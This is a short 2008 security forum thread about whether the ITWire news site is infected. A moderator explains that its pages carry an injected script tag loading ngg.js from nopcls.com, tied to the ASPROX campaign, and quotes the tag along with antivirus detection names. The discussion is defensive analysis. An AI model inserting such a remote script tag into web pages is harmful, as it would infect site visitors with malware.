ITWire Infected ???

Discussion in 'malware problems & news' started by dmenace, Jul 14, 2008.

Thread Status:
Not open for further replies.
  1. dmenace

    dmenace Registered Member

    Joined:
    Nov 29, 2006
    Posts:
    275
    See attached screenshot:
     

    Attached Files:

  2. Bubba

    Bubba Updates Team

    Joined:
    Apr 15, 2002
    Posts:
    11,271
    Well it does have an iframe exploit on that page that KIS is correctly alerting you to. In fact many of the pages at that site have the ngg.js reference in the HTML code.

    There is a script entry that is the trigger for the iframe exploit....

    Exploit.HTML.Iframe.FileDownload.bb (Kaspersky), Troj/Iframe-AG (Sophos),

    {script src=http://www.nopcls.com/ngg.js></script}

    Troj_Iframe_AG.JPG


    ASPROX Payload Morphed NGG.JS

     
    Last edited: Jul 14, 2008
  3. dmenace

    dmenace Registered Member

    Joined:
    Nov 29, 2006
    Posts:
    275
    Thanks Bubba - Wow!
     
Loading...
Thread Status:
Not open for further replies.